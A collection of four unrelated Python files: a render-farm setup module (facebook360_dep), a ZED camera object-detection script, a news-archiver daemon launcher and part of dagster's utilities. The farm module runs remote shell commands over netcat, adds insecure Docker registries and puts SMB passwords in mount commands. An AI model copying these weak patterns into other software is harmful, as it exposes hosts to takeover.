Abstracts over the setup that has to be done for various configurations of the
farm, namely between over a single node, LAN farm, and AWS farm. It additionally sets up
the appropriate flags to execute render.py. setup.py cannot be run standalone.
Attributes:
bin_to_flags (dict[str, list[dict[str, _]]]): Map from binary name to corrsponding flags.
FLAGS (absl.flags._flagvalues.FlagValues): Globally defined flags for render.py. Note that,
unlike all other apps, the FLAGS here do not directly relate to setup.py.
"""
import datetime
import json
import multiprocessing as mp
import os
import re
import signal
import sys
import traceback
from pathlib import Path
from shutil import which
from subprocess import Popen
from threading import Timer
from absl import flags, logging
dir_scripts = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
dir_root = os.path.dirname(dir_scripts)
sys.path.append(dir_root)
sys.path.append(os.path.join(dir_scripts, "util"))
import config
from network import Address, NetcatClient, get_os_type
from scripts.util.system_util import get_flags, image_type_paths, OSType, run_command
FLAGS = flags.FLAGS
flag_names = set()
child_pids = []
facebook360_dep_root = str(Path(os.path.abspath(__file__)).parents[2])
source_root = os.path.join(facebook360_dep_root, "source")
depth_est_src = os.path.join(source_root, "depth_estimation")
bin_to_flags = {
"TemporalBilateralFilter": get_flags(
os.path.join(depth_est_src, "TemporalBilateralFilter.cpp")
),
"ConvertToBinary": get_flags(
os.path.join(source_root, "mesh_stream", "ConvertToBinary.cpp")
),
"DerpCLI": get_flags(os.path.join(depth_est_src, "DerpCLI.cpp")),
"GenerateForegroundMasks": get_flags(
os.path.join(source_root, "render", "GenerateForegroundMasks.cpp")
),
"LayerDisparities": get_flags(os.path.join(depth_est_src, "LayerDisparities.cpp")),
"SimpleMeshRenderer": get_flags(
os.path.join(source_root, "render", "SimpleMeshRenderer.cpp")
),
"UpsampleDisparity": get_flags(
os.path.join(depth_est_src, "UpsampleDisparity.cpp")
),
}
class RepeatedTimer(object):
"""Executes a provided function at periodic intervals.
Attributes:
*args: Variable length argument list for the function to be repeatedly executed.
function (func): Arbitrary function to be repeatedly run.
interval (int): Number of seconds between consecutive runs of the function.
is_running (bool): Whether or not the function is currently running.
**kwargs: Arbitrary keyword arguments for the function to be repeatedly executed.
"""
def __init__(self, interval, function, *args, **kwargs):
"""Sets up a function to be repeatedly run in the background at fixed intervals.
Args:
interval (int): of seconds between consecutive runs of the function.
function (func): Arbitrary function to be repeatedly run.
*args: Variable length argument list.
**kwargs: Arbitrary keyword arguments.
"""
self._timer = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
self.start()
def _run(self):
"""Runs the function asynchronously."""
self.is_running = False
self.start()
self.function(*self.args, **self.kwargs)
def start(self):
"""Starts the repeated execution asynchronously."""
if not self.is_running:
self._timer = Timer(self.interval, self._run)
self._timer.start()
self.is_running = True
def stop(self):
"""Stops the repeated execution."""
self._timer.cancel()
self.is_running = False
def init_facebook360_dep(gflags):
"""Sets up the environment with expected values and handlers.
Args:
gflags (absl.flags._flagvalues.FlagValues): Globally defined flags.
"""
setup_termination_handlers()
set_glog_env(gflags)
setup_logging_handler(gflags.log_dir)
# Glog wrapper doesn't see GLOG environment variables, so we need to set them manually
# GLOG environment variables override local flags
def set_glog_env(gflags):
"""Sets up GLOG environment variables.
Args:
gflags (absl.flags._flagvalues.FlagValues): Globally defined flags.
"""
gflags.alsologtostderr = "1"
gflags.stderrthreshold = "0"
output_address = Address(FLAGS.output_root)
if output_address.protocol != "s3":
gflags.log_dir = os.path.join(FLAGS.output_root, "logs")
# Create logging directory and setup logging handler
def setup_logging_handler(log_dir):
"""Sets up logging.
Args:
log_dir (str): Path to directory where logs should be saved.
"""
if log_dir:
os.makedirs(log_dir, exist_ok=True)
program_name = os.path.splitext(os.path.basename(sys.argv[0]))[0]
logging.get_absl_handler().use_absl_log_file(program_name, log_dir)
def terminate_handler():
"""Cleans workers before terminating the program."""
cleanup_workers()
logging.error("".join(traceback.format_stack()))
sys.exit(0)
def sigterm_handler(signal, frame):
"""Handler for any catchable signal that terminates the program.
Args:
signal (signal.signal): Type of signal.
frame (frame): Stack frame.
"""
logging.error(f"Signal handler called with signal {signal}")
terminate_handler()
def setup_termination_handlers(sigterm_handler=sigterm_handler):
"""Sets up a handler for all termination signals.
Args:
sigterm_handler (func: (signal.signal, frame) -> void, optional): Function for handling
termination signals.
"""
[
signal.signal(s, sigterm_handler)
for s in [
signal.SIGHUP, # terminate process: terminal line hangup
signal.SIGINT, # terminate process: interrupt program
signal.SIGQUIT, # create core image: quit program
signal.SIGILL, # create core image: illegal instruction
signal.SIGTRAP, # create core image: trace trap
signal.SIGFPE, # create core image: floating-point exception
signal.SIGBUS, # create core image: bus error
signal.SIGSEGV, # create core image: segmentation violation
signal.SIGSYS, # create core image: non-existent system call invoked
signal.SIGPIPE, # terminate process: write on a pipe with no reader
signal.SIGTERM, # terminate process: software termination signal
]
]
def define_flags():
"""Defines abseil flags for render."""
for bin in bin_to_flags:
for flag in bin_to_flags[bin]:
if flag["name"] in flag_names:
continue
cmd = f"flags.DEFINE_{flag['type']}('{flag['name']}', {flag['default']}, '{flag['descr']}')"
exec(cmd)
flag_names.add(flag["name"])
flags.DEFINE_integer("chunk_size", 1, "chunk size of work distribution to workers")
flags.DEFINE_string("cloud", "", "cloud compute service (currently supports: aws)")
flags.DEFINE_string("color_type", "color", "type of color to render")
flags.DEFINE_string("disparity_type", "disparity", "type of disparity to render")
flags.DEFINE_boolean(
"do_temporal_filter", True, "whether to run temporal filtering"
)
flags.DEFINE_boolean(
"do_temporal_masking",
False,
"use foreground masks when doing temporal filtering",
)
flags.DEFINE_boolean(
"force_recompute",
False,
"whether to recompute previously performed pipeline stages",
)
flags.DEFINE_string("master", config.LOCALHOST, "ip address of master")
flags.DEFINE_string(
"password", "", "password for NFS (only relevant for SMB mounts)"
)
flags.DEFINE_boolean("run_convert_to_binary", True, "run binary conversion")
flags.DEFINE_boolean("run_depth_estimation", True, "run depth estimation")
flags.DEFINE_boolean("run_fusion", True, "run fusion")
flags.DEFINE_boolean(
"run_generate_foreground_masks", True, "run foreground mask generation"
)
flags.DEFINE_boolean("run_precompute_resizes", True, "run resizing")
flags.DEFINE_boolean(
"run_precompute_resizes_foreground", True, "run foreground mask resizing"
)
flags.DEFINE_boolean("run_simple_mesh_renderer", True, "run simple mesh renderer")
flags.DEFINE_boolean("skip_setup", False, "assume workers have already been set up")
flags.DEFINE_string(
"username", "", "username for NFS (only relevant for SMB mounts)"
)
flags.DEFINE_string("workers", config.LOCALHOST, "ip addresses of workers")
flag_names.update(
{
"chunk_size",
"cloud",
"color_type",
"disparity_type",
"do_temporal_filter",
"do_temporal_masking",
"force_recompute",
"master",
"password",
"run_generate_foreground_masks",
"run_precompute_resizes",
"run_precompute_resizes_foreground",
"run_depth_estimation",
"run_convert_to_binary",
"run_fusion",
"run_simple_mesh_renderer",
"skip_setup",
"username",
"workers",
}
)
def log_flags():
"""Prints formatted list of flags and their values."""
padding = max(len(flag_name) for flag_name in flag_names)
sorted_flags = sorted(flag_names)
for flag_name in sorted_flags:
logging.info(f"{flag_name} = {FLAGS[flag_name].value}".ljust(padding))
def docker_mounts(input_root, host_to_docker_path, username, password):
"""Constructs a list of the relevant commands to mount the external paths.
The mounts are performed as commands if on a LAN and are volume mounts if
for a single node.
Args:
input_root (str): Path to the root of inputs.
host_to_docker_path (dict[str, str]): Map of local paths to path inside container.
username (str): Username for SMB drive. Can be blank if no username is used
for the drive or if rendering locally.
password (str): Password for SMB drive. Can be blank if no password is used
for the drive or if rendering locally.
Returns:
list[str]: List of Docker mount commands
"""
if Address(input_root).protocol == "smb":
mount_creds = f"mount -t cifs -o username={username},password={password} "
mounts = [
f"{mount_creds} //{Address(external_path).ip_path} {docker_path}"
for external_path, docker_path in host_to_docker_path.items()
]
else:
mounts = [
f"--mount type=bind,source={external_path},target={docker_path} \\"
for external_path, docker_path in host_to_docker_path.items()
]
return mounts
def docker_run_cmd(ip, docker_img=config.DOCKER_IMAGE):
"""Constructs the command to run the Docker container. The container will map all
the desired endpoints to the canonical structure internally.
Args:
ip (str): IP of the master.
docker_img (str, optional): Name of the docker image.
Returns:
str: Command to run the configured Docker container.
"""
master = config.DOCKER_LOCALHOST if ip == config.LOCALHOST else FLAGS.master
host_to_docker_path = {
FLAGS.input_root: config.DOCKER_INPUT_ROOT,
FLAGS.color: os.path.join(config.DOCKER_INPUT_ROOT, image_type_paths["color"]),
FLAGS.background_disp: os.path.join(
config.DOCKER_INPUT_ROOT, image_type_paths["background_disp"]
),
FLAGS.background_color: os.path.join(
config.DOCKER_INPUT_ROOT, image_type_paths["background_color"]
),
FLAGS.foreground_masks: os.path.join(
config.DOCKER_INPUT_ROOT, image_type_paths["foreground_masks"]
),
FLAGS.output_root: config.DOCKER_OUTPUT_ROOT,
}
mounts = docker_mounts(
FLAGS.input_root, host_to_docker_path, FLAGS.username, FLAGS.password
)
if Address(FLAGS.input_root).protocol == "smb":
return f"""docker run --privileged \
-t -d {docker_img}:latest \
/bin/bash -c "mkdir {config.DOCKER_INPUT_ROOT} && mkdir {config.DOCKER_OUTPUT_ROOT} && {" && ".join(
mounts)} && python3 {config.DOCKER_SCRIPTS_ROOT}/render/worker.py --master {master}" """
else:
mount_cmds = "\n".join(mounts)
return f"""docker run {mount_cmds} \
-t -d {docker_img}:latest \
python3 {config.DOCKER_SCRIPTS_ROOT}/render/worker.py --master {master}"""
def configure_worker_daemon(ip):
"""Configures the Docker daemon to accept HTTP connections for using the local registry.
Args:
ip (str): IP of the worker.
"""
os_type = get_os_type(ip)
os_paths = {
OSType.MAC: "~/.docker/",
OSType.WINDOWS: "$env:userprofile\.docker",
OSType.LINUX: "/etc/docker/",
}
os_restarts = {
OSType.MAC: [
"""osascript -e 'quit app "Docker"'""",
"open -a Docker",
"until docker ps; sleep 2; done",
],
OSType.WINDOWS: [
"net stop docker",
"net stop com.docker.service",
'taskkill /IM "dockerd.exe" /F',
'taskkill /IM "Docker for Windows.exe" /F',
"net start docker",
"net start com.docker.service",
'& "c:\\Program Files\\Docker\\Docker\\Docker for Windows.exe"',
"while (!(docker ps)) { sleep 2 };",
],
OSType.LINUX: ["systemctl restart docker"],
}
registry = f"{FLAGS.master}:{config.DOCKER_REGISTRY_PORT}"
daemon_json = os.path.join(os_paths[os_type], config.DOCKER_DAEMON_JSON)
nc = NetcatClient(ip, config.NETCAT_PORT)
results = nc.run([f"cat {daemon_json}"])
try:
relevant_part = r"\{[^\}]*\}" # extracts section inside braces
m = re.search(relevant_part, results)
daemon_config = json.loads(m.group(0))
except Exception:
daemon_config = {}
if "insecure-registries" in daemon_config:
if registry in daemon_config["insecure-registries"]:
return
else:
daemon_config["insecure-registries"] = []
daemon_config["insecure-registries"].append(registry)
new_daemon_config = json.dumps(daemon_config)
configure_cmds = [f"echo '{new_daemon_config}' > {daemon_json}"]
configure_cmds += os_restarts[os_type]
nc.run(configure_cmds)
def spawn_worker(ip, num_containers, run_async):
"""Creates worker container(s) on the desired IP.
Args:
ip (str): IP of the machine to run the worker container.
num_containers (int): Number of containers to be run.
run_async (bool): Whether the spawning should happen synchronously or not.
"""
print(f"Spawning worker on: {ip}...")
remote_image = f"{FLAGS.master}:{config.DOCKER_REGISTRY_PORT}/{config.DOCKER_IMAGE}"
configure_worker_daemon(ip)
cmds = ["docker stop $(docker ps -a -q)", f"docker pull {remote_image}"]
cmds += [docker_run_cmd(ip, remote_image)] * num_containers
nc = NetcatClient(ip, config.NETCAT_PORT)
os_type = get_os_type(ip)
if os_type == OSType.LINUX:
nc.run_script("setup_gpu.sh")
if run_async:
nc.run_async(cmds)
else:
nc.run(cmds)
print(f"Completed setup of {ip}!")
def spawn_worker_local(replica):
"""Starts a worker locally.
Args:
replica (int): Replica ID of the worker being spawned.
"""
# We use Popen instead of run_command, since worker process is backgrounded
timestamp = datetime.datetime.now().strftime("%Y%m%d%H%M%S.%f")
worker_logfile = os.path.join(
config.DOCKER_INPUT_ROOT, "logs", f"Worker-{timestamp}-{replica}"
)
os.makedirs(os.path.dirname(worker_logfile), exist_ok=True)
with open(worker_logfile, "w") as fp:
proc = Popen(
[
"python3",
f"{config.DOCKER_SCRIPTS_ROOT}/render/worker.py",
f"--master={FLAGS.master}",
],
stdout=fp,
stderr=fp,
)
global child_pids
child_pids.append(proc.pid)
def setup_master(base_params):
"""Sets up the master node for rendering.
Args:
base_params (dict[str, _]): Map of all the FLAGS defined in render.py.
"""
protocol = Address(base_params["input_root"]).protocol
try:
if protocol == "s3":
run_command("sudo service rabbitmq-server start")
else:
run_command("service rabbitmq-server start")
except Exception:
runtime = "nvidia" if which("nvidia-docker") else ""
cmd = f"""docker run --runtime={runtime} -p 5672:5672 -p 15672:15672 \
-d {config.DOCKER_IMAGE}:latest rabbitmq-server start"""
run_command(cmd)
def setup_workers(base_params):
"""Sets up the worker nodes for rendering.
Args:
base_params (dict[str, _]): Map of all the FLAGS defined in render.py.
"""
processes = []
for worker in FLAGS.workers.split(","):
if ":" in worker:
ip, num_replicas = worker.split(":")
num_replicas = int(num_replicas)
else:
ip = worker
num_replicas = 1
if ip == config.LOCALHOST:
for replica in range(num_replicas):
spawn_worker_local(replica)
else:
processes.append(
mp.Process(target=spawn_worker, args=(ip, num_replicas, False))
)
for process in processes:
process.start()
for process in processes:
process.join()
def cleanup_workers():
"""Destroys the worker process if running locally."""
for child_pid in child_pids:
os.kill(child_pid, signal.SIGTERM)
|
object_detection_zed.py
|
import numpy as np
import os
import six.moves.urllib as urllib
import sys
import tensorflow as tf
import collections
import statistics
import math
import tarfile
import os.path
from threading import Lock, Thread
from time import sleep
import cv2
# ZED imports
import pyzed.sl as sl
sys.path.append('utils')
# ## Object detection imports
from object_detection.utils import ops as utils_ops
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
def load_image_into_numpy_array(image):
ar = image.get_data()
ar = ar[:, :, 0:3]
(im_height, im_width, channels) = image.get_data().shape
return np.array(ar).reshape((im_height, im_width, 3)).astype(np.uint8)
def load_depth_into_numpy_array(depth):
ar = depth.get_data()
ar = ar[:, :, 0:4]
(im_height, im_width, channels) = depth.get_data().shape
return np.array(ar).reshape((im_height, im_width, channels)).astype(np.float32)
lock = Lock()
width = 704
height = 416
confidence = 0.35
image_np_global = np.zeros([width, height, 3], dtype=np.uint8)
depth_np_global = np.zeros([width, height, 4], dtype=np.float)
exit_signal = False
new_data = False
# ZED image capture thread function
def capture_thread_func(svo_filepath=None):
global image_np_global, depth_np_global, exit_signal, new_data
zed = sl.Camera()
# Create a InitParameters object and set configuration parameters
input_type = sl.InputType()
if svo_filepath is not None:
input_type.set_from_svo_file(svo_filepath)
init_params = sl.InitParameters(input_t=input_type)
init_params.camera_resolution = sl.RESOLUTION.HD720
init_params.camera_fps = 30
init_params.depth_mode = sl.DEPTH_MODE.PERFORMANCE
init_params.coordinate_units = sl.UNIT.METER
init_params.svo_real_time_mode = False
# Open the camera
err = zed.open(init_params)
print(err)
while err != sl.ERROR_CODE.SUCCESS:
err = zed.open(init_params)
print(err)
sleep(1)
image_mat = sl.Mat()
depth_mat = sl.Mat()
runtime_parameters = sl.RuntimeParameters()
image_size = sl.Resolution(width, height)
while not exit_signal:
if zed.grab(runtime_parameters) == sl.ERROR_CODE.SUCCESS:
zed.retrieve_image(image_mat, sl.VIEW.LEFT, resolution=image_size)
zed.retrieve_measure(depth_mat, sl.MEASURE.XYZRGBA, resolution=image_size)
lock.acquire()
image_np_global = load_image_into_numpy_array(image_mat)
depth_np_global = load_depth_into_numpy_array(depth_mat)
new_data = True
lock.release()
sleep(0.01)
zed.close()
def display_objects_distances(image_np, depth_np, num_detections, boxes_, classes_, scores_, category_index):
box_to_display_str_map = collections.defaultdict(list)
box_to_color_map = collections.defaultdict(str)
research_distance_box = 30
for i in range(num_detections):
if scores_[i] > confidence:
box = tuple(boxes_[i].tolist())
if classes_[i] in category_index.keys():
class_name = category_index[classes_[i]]['name']
display_str = str(class_name)
if not display_str:
display_str = '{}%'.format(int(100 * scores_[i]))
else:
display_str = '{}: {}%'.format(display_str, int(100 * scores_[i]))
# Find object distance
ymin, xmin, ymax, xmax = box
x_center = int(xmin * width + (xmax - xmin) * width * 0.5)
y_center = int(ymin * height + (ymax - ymin) * height * 0.5)
x_vect = []
y_vect = []
z_vect = []
min_y_r = max(int(ymin * height), int(y_center - research_distance_box))
min_x_r = max(int(xmin * width), int(x_center - research_distance_box))
max_y_r = min(int(ymax * height), int(y_center + research_distance_box))
max_x_r = min(int(xmax * width), int(x_center + research_distance_box))
if min_y_r < 0: min_y_r = 0
if min_x_r < 0: min_x_r = 0
if max_y_r > height: max_y_r = height
if max_x_r > width: max_x_r = width
for j_ in range(min_y_r, max_y_r):
for i_ in range(min_x_r, max_x_r):
z = depth_np[j_, i_, 2]
if not np.isnan(z) and not np.isinf(z):
x_vect.append(depth_np[j_, i_, 0])
y_vect.append(depth_np[j_, i_, 1])
z_vect.append(z)
if len(x_vect) > 0:
x = statistics.median(x_vect)
y = statistics.median(y_vect)
z = statistics.median(z_vect)
distance = math.sqrt(x * x + y * y + z * z)
display_str = display_str + " " + str('% 6.2f' % distance) + " m "
box_to_display_str_map[box].append(display_str)
box_to_color_map[box] = vis_util.STANDARD_COLORS[classes_[i] % len(vis_util.STANDARD_COLORS)]
for box, color in box_to_color_map.items():
ymin, xmin, ymax, xmax = box
vis_util.draw_bounding_box_on_image_array(
image_np,
ymin,
xmin,
ymax,
xmax,
color=color,
thickness=4,
display_str_list=box_to_display_str_map[box],
use_normalized_coordinates=True)
return image_np
def main(args):
svo_filepath = None
if len(args) > 1:
svo_filepath = args[1]
# This main thread will run the object detection, the capture thread is loaded later
# What model to download and load
#MODEL_NAME = 'ssd_mobilenet_v1_coco_2018_01_28'
MODEL_NAME = 'ssd_mobilenet_v1_fpn_shared_box_predictor_640x640_coco14_sync_2018_07_03'
#MODEL_NAME = 'ssd_resnet50_v1_fpn_shared_box_predictor_640x640_coco14_sync_2018_07_03'
#MODEL_NAME = 'ssd_mobilenet_v1_coco_2018_01_28'
#MODEL_NAME = 'faster_rcnn_nas_coco_2018_01_28' # Accurate but heavy
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_FROZEN_GRAPH = 'data/' + MODEL_NAME + '/frozen_inference_graph.pb'
# Check if the model is already present
if not os.path.isfile(PATH_TO_FROZEN_GRAPH):
print("Downloading model " + MODEL_NAME + "...")
MODEL_FILE = MODEL_NAME + '.tar.gz'
MODEL_PATH = 'data/' + MODEL_NAME + '.tar.gz'
DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/'
opener = urllib.request.URLopener()
opener.retrieve(DOWNLOAD_BASE + MODEL_FILE, MODEL_PATH)
tar_file = tarfile.open(MODEL_PATH)
for file in tar_file.getmembers():
file_name = os.path.basename(file.name)
if 'frozen_inference_graph.pb' in file_name:
tar_file.extract(file, 'data/')
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join('data', 'mscoco_label_map.pbtxt')
NUM_CLASSES = 90
# Start the capture thread with the ZED input
print("Starting the ZED")
capture_thread = Thread(target=capture_thread_func, kwargs={'svo_filepath': svo_filepath})
capture_thread.start()
# Shared resources
global image_np_global, depth_np_global, new_data, exit_signal
# Load a (frozen) Tensorflow model into memory.
print("Loading model " + MODEL_NAME)
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_FROZEN_GRAPH, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
# Limit to a maximum of 50% the GPU memory usage taken by TF https://www.tensorflow.org/guide/using_gpu
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.5
# Loading label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES,
use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Detection
with detection_graph.as_default():
with tf.Session(config=config, graph=detection_graph) as sess:
while not exit_signal:
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
if new_data:
lock.acquire()
image_np = np.copy(image_np_global)
depth_np = np.copy(depth_np_global)
new_data = False
lock.release()
image_np_expanded = np.expand_dims(image_np, axis=0)
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
scores = detection_graph.get_tensor_by_name('detection_scores:0')
classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# Actual detection.
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
num_detections_ = num_detections.astype(int)[0]
# Visualization of the results of a detection.
image_np = display_objects_distances(
image_np,
depth_np,
num_detections_,
np.squeeze(boxes),
np.squeeze(classes).astype(np.int32),
np.squeeze(scores),
category_index)
cv2.imshow('ZED object detection', cv2.resize(image_np, (width, height)))
if cv2.waitKey(10) & 0xFF == ord('q'):
cv2.destroyAllWindows()
exit_signal = True
else:
sleep(0.01)
sess.close()
exit_signal = True
capture_thread.join()
if __name__ == '__main__':
main(sys.argv)
|
run.py
|
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# The reason we don't patch threading is because
# our IPC queues rely on it for locking. We can't have them
# be greenlets otherwise they will need the HTTPD to yeild
# before data from the fetch process can be transmitted.
from gevent import monkey; monkey.patch_all(thread=False)
import gevent
from gevent.queue import Queue
from gevent.socket import socket
from gevent.wsgi import WSGIServer
import os
import sys
import pwd
import time
import signal
import _socket
import optparse
from multiprocessing import Process
from emissary import app, init, db
from emissary.models import APIKey
from emissary.controllers.log import Log
from emissary.controllers.scripts import Scripts
from emissary.controllers.load import parse_crontab
from emissary.controllers.manager import FeedManager
try:
import setproctitle
setproctitle.setproctitle("emissary")
except ImportError:
pass
def Daemonise(pidfile):
try:
pid = os.fork()
if pid > 0:
sys.exit(0) # End parent
except OSError, e:
sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(-2)
os.setsid()
os.umask(0)
try:
pid = os.fork()
if pid > 0:
try:
# TODO: Read the file first and determine if already running.
f = file(pidfile, 'w')
f.write(str(pid))
f.close()
except IOError, e:
logging.error(e)
sys.stderr.write(repr(e))
sys.exit(0) # End parent
except OSError, e:
sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(-2)
for fd in (0, 1, 2):
try:
os.close(fd)
except OSError:
pass
def export_crontab(filename):
"""
Defined here to prevent circular imports.
"""
crontab = ""
fd = open(filename, "w")
keys = [k for k in APIKey.query.all() if not k.reader]
for key in keys:
crontab += "apikey: %s\n\n" % key.key
for feed in key.feeds:
crontab += '%s "%s" "%s" %s\n' % (feed.url, feed.name, feed.group.name, feed.schedule)
crontab += '\n\n'
fd.write(crontab)
fd.close()
if __name__ == "__main__":
prog = "Emissary"
description = "A microservice for archiving the news."
epilog = "Psybernetics %s." % time.asctime().split()[-1]
parser = optparse.OptionParser(prog=prog,version=app.version,description=description,epilog=epilog)
parser.set_usage('python -m emissary.run [options]')
parser.add_option("-c", "--crontab", dest="crontab", action="store", default=None, help="Crontab to parse")
parser.add_option("--config", dest="config", action="store", default=None, help="(defaults to emissary.config)")
parser.add_option("-a", "--address", dest="address", action="store", default='0.0.0.0', help="(defaults to 0.0.0.0)")
parser.add_option("-p", "--port", dest="port", action="store", default='6362', help="(defaults to 6362)")
parser.add_option("--key", dest="key", action="store", default=None, help="SSL key file")
parser.add_option("--cert", dest="cert", action="store", default=None, help="SSL certificate")
parser.add_option("--export", dest="export", action="store", default=False, help="Write out current database as a crontab")
parser.add_option("--pidfile", dest="pidfile", action="store", default="emissary.pid", help="(defaults to ./emissary.pid)")
parser.add_option("--logfile", dest="logfile", action="store", default="emissary.log", help="(defaults to ./emissary.log)")
parser.add_option("--stop", dest="stop", action="store_true", default=False)
parser.add_option("--debug", dest="debug", action="store_true", default=False, help="Log to stdout")
parser.add_option("-d", dest="daemonise", action="store_true", default=False, help="Run in the background")
parser.add_option("--run-as", dest="run_as", action="store",default=None, help="(defaults to the invoking user)")
parser.add_option("--scripts-dir", dest="scripts_dir", action="store", default="scripts", help="(defaults to ./scripts/)")
(options,args) = parser.parse_args()
if options.config:
app.config.from_object(options.config)
if options.crontab:
parse_crontab(options.crontab)
raise SystemExit
app.debug = options.debug
# Build logger from config
log = Log("Emissary", log_file=options.logfile, log_stdout= not options.daemonise)
log.debug = options.debug
app.log = log
log("Starting Emissary %s." % app.version)
if options.stop:
pid = None
try:
f = file(options.pidfile, 'r')
pids = f.readline().split()
f.close()
os.unlink(options.pidfile)
except ValueError, e:
sys.stderr.write('Error in pid file "%s". Aborting\n' % options.pidfile)
sys.exit(-1)
except IOError, e:
pass
if pids:
for pid in pids:
os.kill(int(pid), 15)
print "Killed process with ID %s." % pid
else:
sys.stderr.write('Emissary not running or no PID file found\n')
sys.exit(0)
if options.export:
try:
export_crontab(options.export_crontab)
log('Crontab written to "%s".' % options.export_crontab)
except Exception, e:
log('Error writing crontab: %s' % e.message)
raise SystemExit
if not options.key and not options.cert:
print "SSL cert and key required. (--key and --cert)"
print "Keys and certs can be generated with:"
print "$ openssl genrsa 1024 > key"
print "$ openssl req -new -x509 -nodes -sha1 -days 365 -key key > cert"
raise SystemExit
if '~' in options.cert: options.cert = os.path.expanduser(options.cert)
if '~' in options.key: options.key = os.path.expanduser(options.key)
if not os.path.isfile(options.cert):
sys.exit("Certificate not found at %s" % options.cert)
if not os.path.isfile(options.key):
sys.exit("Key not found at %s" % options.key)
if (pwd.getpwuid(os.getuid())[2] == 0) and not options.run_as:
print "Running as root is not permitted.\nExecute this as a different user."
raise SystemExit
sock = (options.address, int(options.port))
if options.run_as:
sock = socket(family=_socket.AF_INET)
try:
sock.bind((options.address, int(options.port)))
except _socket.error:
ex = sys.exc_info()[1]
strerror = getattr(ex, 'strerror', None)
if strerror is not None:
ex.strerror = strerror + ': ' + repr(options.address+':'+options.port)
raise
sock.listen(50)
sock.setblocking(0)
uid = pwd.getpwnam(options.run_as)[2]
try:
os.setuid(uid)
log("Now running as %s." % options.run_as)
except Exception, e: raise
# Create the database schema and insert an administrative key
init()
if options.daemonise: Daemonise(options.pidfile)
# Load scripts
app.scripts = Scripts(options.scripts_dir)
app.scripts.reload()
# Trap SIGHUP to reload scripts
signal.signal(signal.SIGHUP, app.scripts.reload)
# Initialise the feed manager with the logger, provide IPC access and load feeds.
fm = FeedManager(log)
fm.db = db
fm.app = app # Queue access
fm.load_feeds()
# Start the REST interface
httpd = WSGIServer(sock, app, certfile=options.cert, keyfile=options.key)
httpd.loop.reinit()
httpd_process = Process(target=httpd.serve_forever)
log("Binding to %s:%s" % (options.address, options.port))
httpd_process.start()
if options.daemonise:
f = file(options.pidfile, 'a')
f.write(' %i' % httpd_process.pid)
f.close()
try:
fm.run()
except KeyboardInterrupt:
log("Stopping...")
httpd_process.terminate()
|
__init__.py
|
import contextlib
import datetime
import errno
import inspect
import multiprocessing
import os
import re
import signal
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import yaml
from six.moves import configparser
from dagster import check
from dagster.core.errors import DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, thread
from dagster.seven.abc import Mapping
from dagster.utils.merger import merge_dicts
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
PICKLE_PROTOCOL = 2
DEFAULT_REPOSITORY_YAML_FILENAME = 'repository.yaml'
def file_relative_path(dunderfile, relative_path):
'''
This function is useful when one needs to load a file that is
relative to the position of the current file. (Such as when
you encode a configuration file path in source file and want
in runnable in any current working directory)
It is meant to be used like the following:
file_relative_path(__file__, 'path/relative/to/file')
'''
check.str_param(dunderfile, 'dunderfile')
check.str_param(relative_path, 'relative_path')
return os.path.join(os.path.dirname(dunderfile), relative_path)
def script_relative_path(file_path):
'''
Useful for testing with local files. Use a path relative to where the
test resides and this function will return the absolute path
of that file. Otherwise it will be relative to script that
ran the test
Note: this is function is very, very expensive (on the order of 1
millisecond per invocation) so this should only be used in performance
insensitive contexts. Prefer file_relative_path for anything with
performance constraints.
'''
# from http://bit.ly/2snyC6s
check.str_param(file_path, 'file_path')
scriptdir = inspect.stack()[1][1]
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, 'string')
string = re.sub(r'^[\-_\.]', '', str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r'[\-_\.\s]([a-z])', lambda matched: str(matched.group(1)).upper(), string[1:]
)
def ensure_single_item(ddict):
check.dict_param(ddict, 'ddict')
check.param_invariant(len(ddict) == 1, 'ddict', 'Expected dict with single item')
return list(ddict.items())[0]
@contextlib.contextmanager
def pushd(path):
old_cwd = os.getcwd()
os.chdir(path)
try:
yield path
finally:
os.chdir(old_cwd)
def safe_isfile(path):
'''"Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
'''
try:
return os.path.isfile(path)
except ValueError:
return False
